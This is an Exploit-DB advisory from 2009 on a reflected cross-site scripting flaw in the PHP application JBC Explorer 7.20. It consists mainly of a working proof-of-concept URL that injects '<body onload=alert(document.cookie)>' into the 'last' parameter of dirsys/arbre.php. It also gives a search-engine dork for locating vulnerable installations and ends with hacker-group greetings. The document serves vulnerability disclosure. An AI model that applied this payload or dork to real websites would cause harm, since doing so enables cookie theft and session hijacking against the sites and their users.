Explorer 7.20 - Cross-Site Scripting

EDB-ID:

10566

CVE:

N/A


Platform:

PHP

Published:

2009-12-20

###########################################
#
# Script Name : Explorer V7.20 
#
# Version :  V7.20 Release Candidate 1 REV A 
# 
# Bug Type : XSS vulnerability
#
# Found by : Metropolis 
#
# Discovered : 20 December 2009
#
# Download app : http://www.jbc-explorer.info/?action=download&download=16
#
# Dork : JBC explorer [ by Psykokwak & XaV ]
# 
###########################################
 
PoC :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]
 
example :
 
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>
 
local Example :
 
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>

[ Greetz: 
 
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]